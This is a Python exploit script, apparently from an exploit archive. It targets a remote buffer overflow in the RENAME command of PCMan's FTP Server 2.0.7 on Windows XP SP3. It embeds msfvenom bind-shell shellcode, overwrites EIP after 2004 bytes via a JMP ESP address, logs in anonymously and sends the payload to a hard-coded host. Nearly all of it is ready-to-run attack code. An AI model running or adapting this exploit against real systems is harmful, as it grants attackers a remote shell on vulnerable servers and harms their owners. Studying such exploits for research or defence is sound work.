#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date:  29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3

import socket
import sys

# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f" 
"\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b"
"\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4" 
"\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6" 
"\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7" 
"\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62" 
"\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92" 
"\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16" 
"\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc" 
"\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60" 
"\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92" 
"\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d" 
"\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73" 
"\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40" 
"\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c" 
"\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79" 
"\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4" 
"\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16" 
"\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5" 
"\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e" 
"\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28" 
"\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b" 
"\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0" 
"\x2d\xc2")

# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
# bad data is a string of 2004 "A" characters to get to a EIP overwrite
# followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll
baddata = '\x41'*2004+'\xed\x8e\xb4\x7c'

# login to ftp followed by sending the bad data & payload
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.135',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n')
s.close()
